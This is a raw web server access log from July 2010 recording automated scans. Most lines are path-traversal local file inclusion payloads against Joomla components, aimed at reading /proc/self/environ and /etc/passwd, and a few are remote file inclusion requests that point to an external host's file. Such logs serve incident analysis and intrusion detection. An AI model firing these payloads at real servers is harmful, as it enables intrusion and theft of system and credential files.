66.71.245.122 - - [27/Jul/2010:22:18:02 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
66.71.245.122 - - [27/Jul/2010:22:18:09 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
66.71.245.122 - - [27/Jul/2010:22:19:52 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
66.71.245.122 - - [27/Jul/2010:22:20:05 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
66.71.245.122 - - [27/Jul/2010:22:30:49 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
66.71.245.122 - - [27/Jul/2010:22:31:01 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
65.13.185.104 - - [27/Jul/2010:22:32:22 +0200] "GET /logs/access_log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
65.13.185.104 - - [27/Jul/2010:22:32:22 +0200] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
65.13.185.104 - - [27/Jul/2010:22:32:23 +0200] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
178.162.133.106 - - [27/Jul/2010:22:32:23 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.823"
178.162.133.106 - - [27/Jul/2010:22:33:36 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.823"
178.162.133.106 - - [27/Jul/2010:22:33:36 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.823"
202.160.123.72 - - [27/Jul/2010:22:33:38 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
178.162.133.106 - - [27/Jul/2010:22:33:41 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.823"
178.162.133.106 - - [27/Jul/2010:22:33:41 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.823"
202.160.123.72 - - [27/Jul/2010:22:34:25 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
202.160.123.72 - - [27/Jul/2010:22:34:26 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
178.162.133.106 - - [27/Jul/2010:22:34:38 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.823"
202.160.123.72 - - [27/Jul/2010:22:35:07 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
202.160.123.72 - - [27/Jul/2010:22:35:08 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
178.162.133.106 - - [27/Jul/2010:22:35:31 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.823"
66.71.245.122 - - [27/Jul/2010:22:35:34 +0200] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.831"
66.71.245.122 - - [27/Jul/2010:22:35:34 +0200] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.831"
66.71.245.122 - - [27/Jul/2010:22:35:34 +0200] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.831"
66.71.245.122 - - [27/Jul/2010:22:35:47 +0200] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.831"
202.160.123.72 - - [27/Jul/2010:22:36:50 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
202.160.123.72 - - [27/Jul/2010:22:38:12 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
174.121.191.5 - - [27/Jul/2010:22:47:12 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
174.121.191.5 - - [27/Jul/2010:22:47:15 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
174.121.191.5 - - [27/Jul/2010:22:49:17 +0200] "GET /logs/access_log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
174.121.191.5 - - [27/Jul/2010:22:49:17 +0200] "GET /logs/access_log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
174.121.191.5 - - [27/Jul/2010:22:49:17 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
174.121.191.5 - - [27/Jul/2010:22:49:17 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
174.121.191.5 - - [27/Jul/2010:22:49:17 +0200] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
174.121.191.5 - - [27/Jul/2010:22:49:17 +0200] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
66.71.245.122 - - [27/Jul/2010:22:52:30 +0200] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.831"
66.71.245.122 - - [27/Jul/2010:22:52:30 +0200] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
94.23.215.207 - - [27/Jul/2010:22:54:43 +0200] "GET /logs/*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:22:54:44 +0200] "GET /*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 287 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:22:55:13 +0200] "GET /logs/*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:22:55:17 +0200] "GET /*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 287 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:22:55:23 +0200] "GET /logs/*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:22:55:24 +0200] "GET /*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 287 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:22:55:37 +0200] "GET /logs/*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:22:55:38 +0200] "GET /*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 287 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:22:55:55 +0200] "GET /logs/*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:22:55:58 +0200] "GET /*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 287 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:22:56:25 +0200] "GET /logs/*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:22:56:26 +0200] "GET /*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 287 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:22:56:27 +0200] "GET /logs/*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:22:56:27 +0200] "GET /*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 287 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:22:56:45 +0200] "GET /logs/*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:22:56:46 +0200] "GET /*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 287 "-" "libwww-perl/5.803"
174.121.192.28 - - [27/Jul/2010:22:58:02 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.810"
174.121.192.28 - - [27/Jul/2010:22:58:02 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.810"
207.210.86.178 - - [27/Jul/2010:22:58:40 +0200] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 295 "-" "Mozilla/5.0"
81.93.3.182 - - [27/Jul/2010:22:58:48 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.808"
81.93.3.182 - - [27/Jul/2010:22:58:48 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.808"
78.41.233.128 - - [27/Jul/2010:22:58:50 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.805"
78.41.233.128 - - [27/Jul/2010:22:58:50 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.805"
91.121.67.226 - - [27/Jul/2010:22:58:55 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.803"
91.121.67.226 - - [27/Jul/2010:22:58:55 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.803"
202.160.123.72 - - [27/Jul/2010:23:01:01 +0200] "GET /logs/access_log/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
202.160.123.72 - - [27/Jul/2010:23:01:02 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
202.160.123.72 - - [27/Jul/2010:23:01:02 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
94.23.215.207 - - [27/Jul/2010:23:05:59 +0200] "GET /logs/*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:05:59 +0200] "GET /logs/*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:05:59 +0200] "GET /*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 287 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:05:59 +0200] "GET /*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 287 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:06:21 +0200] "GET /logs/*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:06:21 +0200] "GET /*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 287 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:06:27 +0200] "GET /logs/*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:06:27 +0200] "GET /*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 287 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:06:38 +0200] "GET /logs/*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:06:38 +0200] "GET /*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 287 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:06:54 +0200] "GET /logs/*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:06:54 +0200] "GET /*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 287 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:07:03 +0200] "GET /logs/*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:07:03 +0200] "GET /*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 287 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:07:27 +0200] "GET /logs/*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:07:27 +0200] "GET /*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 287 "-" "libwww-perl/5.803"
174.121.192.28 - - [27/Jul/2010:23:10:19 +0200] "GET /logs/lfibug../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-" "libwww-perl/5.810"
174.121.192.28 - - [27/Jul/2010:23:10:19 +0200] "GET /lfibug../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-" "libwww-perl/5.810"
213.5.64.21 - - [27/Jul/2010:23:11:06 +0200] "GET / HTTP/1.1" 200 559 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
78.41.233.128 - - [27/Jul/2010:23:11:33 +0200] "GET /logs/lfibug../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-" "libwww-perl/5.805"
78.41.233.128 - - [27/Jul/2010:23:11:33 +0200] "GET /lfibug../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-" "libwww-perl/5.805"
91.121.67.226 - - [27/Jul/2010:23:11:43 +0200] "GET /lfibug../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
81.93.3.182 - - [27/Jul/2010:23:11:44 +0200] "GET /lfibug../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-" "libwww-perl/5.808"
78.41.233.128 - - [27/Jul/2010:23:11:55 +0200] "GET /lfibug../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-" "libwww-perl/5.805"
174.121.192.28 - - [27/Jul/2010:23:12:00 +0200] "GET /lfibug../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-" "libwww-perl/5.810"
202.160.123.72 - - [27/Jul/2010:23:12:11 +0200] "GET /logs/access_log/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
202.160.123.72 - - [27/Jul/2010:23:12:12 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
202.160.123.72 - - [27/Jul/2010:23:12:12 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
174.121.191.5 - - [27/Jul/2010:23:12:34 +0200] "GET /logs/access_log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
174.121.191.5 - - [27/Jul/2010:23:12:35 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
174.121.191.5 - - [27/Jul/2010:23:12:35 +0200] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
81.93.3.182 - - [27/Jul/2010:23:14:30 +0200] "GET /logs/access_log/lfibug../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 370 "-" "libwww-perl/5.808"
81.93.3.182 - - [27/Jul/2010:23:14:30 +0200] "GET /lfibug../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-" "libwww-perl/5.808"
81.93.3.182 - - [27/Jul/2010:23:14:30 +0200] "GET /logs/lfibug../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-" "libwww-perl/5.808"
78.41.233.128 - - [27/Jul/2010:23:14:40 +0200] "GET /logs/access_log/lfibug../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 370 "-" "libwww-perl/5.805"
78.41.233.128 - - [27/Jul/2010:23:14:40 +0200] "GET /lfibug../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-" "libwww-perl/5.805"
78.41.233.128 - - [27/Jul/2010:23:14:41 +0200] "GET /logs/lfibug../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-" "libwww-perl/5.805"
174.121.192.28 - - [27/Jul/2010:23:14:58 +0200] "GET /logs/access_log/lfibug../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 370 "-" "libwww-perl/5.810"
174.121.192.28 - - [27/Jul/2010:23:14:59 +0200] "GET /lfibug../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-" "libwww-perl/5.810"
174.121.192.28 - - [27/Jul/2010:23:14:59 +0200] "GET /logs/lfibug../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-" "libwww-perl/5.810"
91.121.67.226 - - [27/Jul/2010:23:15:06 +0200] "GET /logs/access_log/lfibug../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 370 "-" "libwww-perl/5.803"
91.121.67.226 - - [27/Jul/2010:23:15:06 +0200] "GET /lfibug../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.67.226 - - [27/Jul/2010:23:15:06 +0200] "GET /logs/lfibug../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-" "libwww-perl/5.803"
202.160.123.72 - - [27/Jul/2010:23:15:13 +0200] "GET /logs/access_log/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
202.160.123.72 - - [27/Jul/2010:23:15:14 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
202.160.123.72 - - [27/Jul/2010:23:15:14 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
94.23.215.207 - - [27/Jul/2010:23:17:36 +0200] "GET /logs/*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:17:37 +0200] "GET /*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:17:37 +0200] "GET /logs/*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:17:37 +0200] "GET /*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:18:21 +0200] "GET /logs/*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:18:21 +0200] "GET /*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:18:28 +0200] "GET /logs/*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:18:28 +0200] "GET /*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:23:06 +0200] "GET /logs/*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:23:06 +0200] "GET /logs/*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:23:06 +0200] "GET /*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:23:06 +0200] "GET /*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:23:18 +0200] "GET /logs/*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:23:19 +0200] "GET /*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:23:25 +0200] "GET /logs/*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:23:25 +0200] "GET /*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:23:50 +0200] "GET /logs/*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:23:51 +0200] "GET /*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:24:07 +0200] "GET /logs/*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:24:07 +0200] "GET /*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
67.195.114.225 - - [27/Jul/2010:23:24:11 +0200] "GET / HTTP/1.0" 200 559 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.23.215.207 - - [27/Jul/2010:23:24:15 +0200] "GET /logs/*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:24:15 +0200] "GET /*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:24:15 +0200] "GET /logs/*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:24:16 +0200] "GET /*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.228.131.90 - - [27/Jul/2010:23:29:31 +0200] "GET /logs/mygallerybrowser.php?myPath=http://www.tehuurinutrecht.nl/language/data/id1.jpg?? HTTP/1.1" 404 311 "-" "MaMa CaSpEr"
94.228.131.90 - - [27/Jul/2010:23:29:31 +0200] "GET /logs/access_log%20%20/mygallerybrowser.php?myPath=http://www.tehuurinutrecht.nl/language/data/id1.jpg?? HTTP/1.1" 404 324 "-" "MaMa CaSpEr"
94.228.131.90 - - [27/Jul/2010:23:29:31 +0200] "GET /mygallerybrowser.php?myPath=http://www.tehuurinutrecht.nl/language/data/id1.jpg?? HTTP/1.1" 404 306 "-" "MaMa CaSpEr"
